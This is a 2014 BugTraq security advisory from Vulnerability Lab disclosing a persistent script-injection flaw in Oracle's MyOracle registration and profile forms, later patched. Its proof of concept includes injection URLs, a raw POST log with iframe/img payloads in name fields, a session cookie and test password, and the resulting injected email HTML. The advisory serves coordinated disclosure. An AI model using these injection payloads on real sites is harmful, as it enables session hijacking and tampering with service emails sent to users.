BugTraq
Oracle Corporation MyOracle - Persistent Vulnerability Sep 18 2014 11:29AM
Vulnerability Lab (research vulnerability-lab com)
Document Title:
===============
Oracle Corporation MyOracle - Persistent Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1261

Oracle Security ID (Team Tracking ID): admin (at) vulnerability-lab (dot) com- [email concealed]001:2014

http://vulnerability-db.com/magazine/articles/2014/09/17/oracle-corporat
ion-fixed-vulnerability-myoracle-online-service-application

Release Date:
=============
2014-09-17

Vulnerability Laboratory ID (VL-ID):
====================================
1261

Common Vulnerability Scoring System:
====================================
3.9

Product & Service Introduction:
===============================
Oracle Corporation is an American multinational computer technology corporation headquartered in Redwood City, California, United States.
The company specializes in developing and marketing computer hardware systems and enterprise software products â?? particularly its own brands
of database management systems. Oracle is the second-largest software maker by revenue, after Microsoft. The company also builds tools for
database development and systems of middle-tier software, enterprise resource planning (ERP) software, customer relationship management (CRM)
software and supply chain management (SCM) software. Larry Ellison, a co-founder of Oracle, has served as Oracle`s CEO throughout its history.
He also served as the Chairman of the Board until his replacement by Jeffrey O. Henley in 2004. On August 22, 2008, the Associated Press
ranked Ellison as the top-paid chief executive in the world.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Oracle_Corporation )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent vulnerability in the official Oracle Corporation `MyOracle` service web-application.

Vulnerability Disclosure Timeline:
==================================
2014-04-28: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-04-30: Vendor Notification (Oracle Sec Alert Security Team)
2014-05-03: Vendor Response/Feedback (Oracle Sec Alert Security Team)
2014-09-01: Vendor Fix/Patch (Oracle Developer Team - Acknowledgments 2014 October CPU Advisory)
2014-09-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A filter and persistent input validation mail encoding web vulnerability has been discovered in the official Oracle Corporation `MyOracle` service web-application.
The vulnerability allows to bypass the regular web/system validation to inject own script codes in outgoing emails of the account system mail server service.

The vulnerability is located in the name values of the my-oracle `registration` module. Remote attackers are able to inject in the first and lastname input fields of the
registration formular own script codes via POST method request. The injected script code activates the account mail service notification which returns with the persistent
code in the myoracle token activation site. The issue impact a critical risk because an attacker is able to inject own tokens or can manipulate the full mail body context.
Further send notification mails by the myoracle service can also be affected by the issue. The encoding of the server does not recognize outgoing service mails which
results in the persistent issue in outgoing emails. The injection point is a profile values update or directly the remote registration itself. The security risk of the
persistent mail encoding and filter web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9.

Exploitation of the vulnerability requires low user interaction and no privileged application user account. Successful exploitation results in persistent session hijacking
attacks, unauthorized external redirects to malicious sources and persistent manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Service(s):
[+] MyOracle

Vulnerable Module(s):
[+] Registration (exp.)

Vulnerable Parameter(s):
[+] Profile name values (firstname & lastname ...)

[Sender]:
[+] oracle-acct_ww (at) oracle (dot) com [email concealed]

[Receiver]:
[+] admin (at) evolution-sec (dot) com [email concealed] & bkm (at) evolution-sec (dot) com [email concealed]

Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers with low user interaction and without privileged application user account.
For security demonstration or to reproduce the persistent mail encoding web vulnerability follow the provided information and steps below to continue.

Sender Mailbox - Main Oracle Server
oracle-acct_ww (at) oracle (dot) com [email concealed]

Affected Mailbox - Receiver/Victim
admin (at) evolution-sec (dot) com [email concealed]
bkm (at) evolution-sec (dot) com [email concealed]

Inject via Profile (POST)
https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx?n
extURL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage
?page_id=3

Inject via Registration (POST)
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextU
RL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admi
n.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~675513E7AD76FD8C4E372E51B2
B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52
B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E
5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1
816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C3
9165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBC
B4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2
687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9F
EFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E96
74F7A0

After Inject (REDIRECT OPTIONS)
https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextU
RL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admi
n.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~675513E7AD76FD8C4E372E51B2
B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52
B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E
5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1
816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C3
9165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBC
B4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2
687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9F
EFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E96
74F7A0

-- PoC Session Logs [POST] ---

20:16:31.280[4105ms][total 4105ms] Status: 302[Moved Temporarily]
POST https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextU
RL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admi
n.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD8C4E372E
51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB
1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D771476
6E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87
A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEA
A2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628A
CDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D
63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBC
BC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E
4E9674F7A0 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Grö�e des Inhalts[720] Mime Type[text/html]
Request Header:
Host[myprofile.oracle.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://myprofile.oracle.com/EndUser/faces/profile/createUser.js
px?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_
app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD
8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A
62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF
3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB4
89567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25
403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C
1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B
3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908
907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39
C3E3C32E4E9674F7A0]
Cookie[optimizelySegments=%7B%22174383146%22%3A%22ff%22%2C%22174203172%2
2%3A%22false%22%2C%22173164270%22%3A%22direct%22%7D; optimizelyEndUserId=oeu1398447211204r0.7026125166698021; optimizelyBuckets=%7B%7D; s_cc=true; s_fid=343B504EB719CF63-1174BEDEC7EE3C0B; s_nr=1398449779754; gpw_e24=https%3A%2F%2Fmyprofile.oracle.com%2FEndUser%2Ffaces%2Fprofile%2
FcreateUser.jspx%3FnextURL%3Dhttps%253A%252F%252Flogin.oracle.com%252Fpl
s%252Forasso%252Forasso.wwsso_app_admin.ls_login%253FSite2pstoreToken%25
3Dv1.2%257E656BF073%257E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2B
D867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD84
5E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E
16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868
EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA417895
48D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079
F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B2
2C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70
E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0; s_sq=oracleglobal%3D%2526pid%253Dprofile%25253Aen-us%25253Acreate-user%2
526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BTrPage._autoSubmi
t('f1'%25252C'usr_srv_otn'%25252Cevent%25252C1)%25253Breturntrue%25253B%
25257D%2526oidt%253D2%2526ot%253DCHECKBOX; p_org_id=1001; p_lang=US; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getp
age?page_id=3; atgPlatoStop=1; BreadCrumb=%257BlevelName%253A%253A%253Cspan%2520style%253D%2522color%25
3ARED%253B%2520font-weight%253Abold%253B%2520font-size%253A11px%253B%252
2%253EOracle%253C/span%253E%2520University%2520Home%2523%2523levelUrl%25
3A%253A/pls/web_prod-plq-dad/db_pages.getpage%253Fpage_id%253D3%257D%257
C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257
C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257
C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257
C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D; JSESSIONID=GBTGThlDQtGWmKXcVyTT5SF2LNBpRNGJ65Ls1KTZSjRf5rXvxm8L!10065134
18!189473844; BIGipServermktap_myprofile_cache_pool=1729139341.26910.0000; notice_preferences=2:cb8350a2759273dccf1e483791e6f8fd; s_eVar21=CLD-hp-panel-build-business-intelligence]
Connection[keep-alive]
POST-Daten:
ops[Bitte+w%C3%A4hlen+Sie+...]
drm[Sie+m%C3%BCssen+%7B0%7D+eingeben.]
drsm[Sie+m%C3%BCssen+f%C3%BCr+%7B0%7D+mindestens+ein+Element+ausw%C3%A4h
len]
err[FEHLER]
reqd[Erforderliches+Feld.]
lqws[https%3A%2F%2Floqate.oracle.com%2FLoqate%2FLoqate]
unamefield[admin%40evolution-sec.com]
passwd1[Keymaster148%21]
passwd2[Keymaster148%21]
givenname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
middlename[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]

sn[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
usr_jtitle[pentester]
usr_ctry[41]
usr_state[6]
usr_cty[Kassel]
companyname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E
]
usr_line1[bremerstrasse+1337]
usr_line2[]
usr_postal_code[34125]
telephonenumber[573246234]
usr_srv_otn[t]
usr_srv_cio[t]
usr_nsl_psn[t]
org.apache.myfaces.trinidad.faces.FORM[f1]
_noJavaScript[false]
javax.faces.ViewState[%2118erzf7qoc]
event[]
source[cb1]
partial[]
Response Header:
Location[https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.j
spx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso
_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76F
D8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6
A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BE
F3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB
489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A2
5403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47
C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8
B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C4419390
8907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED3
9C3E3C32E4E9674F7A0]
X-Frame-Options[sameorigin]
Content-Type[text/html]
Content-Language[en]
Content-Encoding[gzip]
Server[Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=122956956898568077,0)]
Content-Length[720]
Vary[Accept-Encoding]
Date[Fri, 25 Apr 2014 18:16:45 GMT]
Connection[keep-alive]

PoC: Exploitcode in Mail

<html><head>
<title>Bitte verifizieren Sie Ihren Oracle Account</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>Betreff: </b>Bitte verifizieren Sie Ihren Oracle Account</td></tr><tr><td><b>Von: </b>oracle-acct_ww (at) oracle (dot) com [email concealed]</td></tr><tr><td><b>Datum: </b>25.04.2014 20:16</td></tr></tbody></table><table class="header-part2" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>An: </b>admin (at) evolution-sec (dot) com [email concealed]</td></tr></tbody></table><br>
<meta http-equiv="Content-Type" content="text/html; "><table cellpadding="0" cellspacing="0" align="center" border="0" width="640"><tbody><tr><td style="border-top:#CCCCCC solid 1px; border-right:#CCCCCC solid 1px; border-bottom:#CCCCCC solid 1px; border-left:#CCCCCC solid 1px; background-color:#FFFFFF;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td style="background-color:#FF0000;"><a href="http://www.oracle.com" target="_blank"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digital
asset/302715.gif" alt="Oracle Corporation" border="0" height="30" hspace="12" width="123"></a></td></tr><tr><td style="padding:15 15 15 15; font-family:Arial, Helvetica, sans-serif; font-size:12px; color:#333333;">Sehr geehrte(r) "><iframe src="http://www.vulnerability-lab.com">%20"><img src="x">,<br><br>Bitte klicken Sie zum Best�¤tigen Ihres Accounts auf den folgenden Link. Der Link ist 5� Tage lang g�¼ltig.<br><br><a href="https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccou
nt.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD025
7E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE"><f
ont color="#FF0000">Link zur Accountverifizierung</font></a><br><br>Ihr Oracle Benutzername: admin (at) evolution-sec (dot) com [email concealed]<br><br><b>Warum Email Verifizierung?</b><br><li>Schutz Ihrer Daten</li><li>Zugriff auf Oracle Anwendungen und Websites, die eine Verifizierung erfordern</li><br><br><b>Der Link zur Accountverifizierung funktioniert nicht?</b><br>Sollte der obige Link nicht funktionieren k�¶nnen Sie zur Verifizierung Ihrer Emailadresse auch die folgende URL kopieren und in Ihren Browser einf�¼gen:<br><br>[https://myprofile.oracle.com/EndUser/faces/profile/
sso/verifyAccount.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C
4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2
516B405A9FE]<br><br><b>Sie wollen eine weitere Best�¤tigungsemail generieren?</b><br>1) <a href="https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.
jspx" target="_blank"><font color="#FF0000">Melden Sie sich bei Ihrem Account an.</font></a><br>2) Klicken Sie auf den Link "Account verifizieren" oder "Account erneut verifizieren". <br><br>Vielen Dank.<br>Das Oracle Account Team</font><br><br><hr style="color:#CCCCCC; height:1px;" /><strong>Richtlinien:</strong><br><font size="1">Bitte bedenken Sie, dass Ihre Nutzung der Oracle Websites und Services der <a href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font color="#FF0000">Oracle Datenschutzrichtlinie</font></a> und den <a href="http://www.oracle.com/us/legal/index.html" target="_blank"><font color="#FF0000">Servicebedingungen</font></a> unterliegt.<br><br>Verwaltung Ihres Benutzerkontos: Bitte aktualisieren Sie Ihre Emailadresse bei etwaigen Ã?â??nderungen, damit wir Ihnen im Falle von Problemen mit dem Kontozugriff behilflich sein kÃ?¶nnen. Melden Sie sich dafÃ?¼r zunÃ?¤chst an und klicken Sie dann auf den Link "Benutzernamen Ã?¤ndern" auf Ihrer Oracle Account-Seite.<br><br>Aktualisieren der Kommunikationseinstellungen fÃ?¼r Ihre Emailadresse: Bitte melden Sie sich bei Ihrem Account an, um die Einstellungen der Kommunikationseinstellungen fÃ?¼r Ihre Emailadresse zu aktualisieren.<br><br>Sie haben diese Email erhalten, da vor kurzem fÃ?¼r diese Emailadresse ein Benutzerkonto auf der Oracle Website erstellt wurde. Wenn Sie in letzter Zeit kein Benutzerkonto auf der Oracle Website erstellt haben, <a href="http://apex.oracle.com/pls/otn/f?p=42988:3" target="_blank"><font color="#FF0000">senden</font></a> Sie uns eine Hilfsanfrage.<br><br>Bei Zugriffs- oder Anmeldeproblemen <a href="http://apex.oracle.com/pls/otn/f?p=42988:3:2527260596859682::NO:::
" target="_blank"><font color="#FF0000">klicken Sie bitte hier</a>.</font><br></tr><tr><td style="padding:15 15 15 15; border-top:#CCCCCC solid 1px; border-bottom:#CCCCCC solid 1px;"><a href="http://www.oracle.com/us/corporate/index.html" target="_blank"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digital
asset/196263.gif" alt="Hardware and Software Engineered to Work Together" width="174" height="50" border="0" /></a></td></tr><tr><td><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td height="25" style="padding:0 0 0 15;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333">Copyright 2014, Oracle. Alle Rechte vorbehalten.</font></td><td align="right" style="padding:0 15 0 0;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333"> <a href="http://www.oracle.com/de/corporate/contact/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Kontakt</u></font></a> | <a href="http://www.oracle.com/us/legal/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Rechtliche Hinweise und Nutzungsbedingungen</u></font></a> | <a href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Datenschutz</u></font></a></font></td></tr></table></td><
/tr></table></td></tr></table></body></html>
</body>
</html>
</iframe></td></tr></tbody></table></td></tr></tbody></table></body></ht
ml>

Script Code Payload:
><iframe src="http://www.vulnerability-lab.com">%20"><img src="http://evolution-sec.com/sites/default/files/65-2_0.png">

Reference(s):
https://myprofile.oracle.com/
https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jsp
x
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextU
RL=x
https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.l
s_login%3FSite2pstoreToken

Picture(s):
../1.png
../2.png
../3.png

Resource(s):
../Account verifizieren.htm
../Bitte verifizieren Sie Ihren Oracle Account.html
../Bitte verifizieren Sie Ihren Oracle Account_poc.html
../poc.txt

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable first- and last-name input fields in the myoracle application.
Encode stored data of user in the dbms when processing to send service notifications by the mail info@oracle email to prevent persistent injection attacks.

Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability in the myoracle account system web-server is estimated as medium.

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm (at) evolution-sec (dot) com [email concealed]) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin (at) vulnerability-lab (dot) com [email concealed] - research (at) vulnerability-lab (dot) com [email concealed] - admin (at) evolution-sec (dot) com [email concealed]
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin (at) vulnerability-lab (dot) com [email concealed] or research (at) vulnerability-lab (dot) com [email concealed]) to get a permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research (at) vulnerability-lab (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus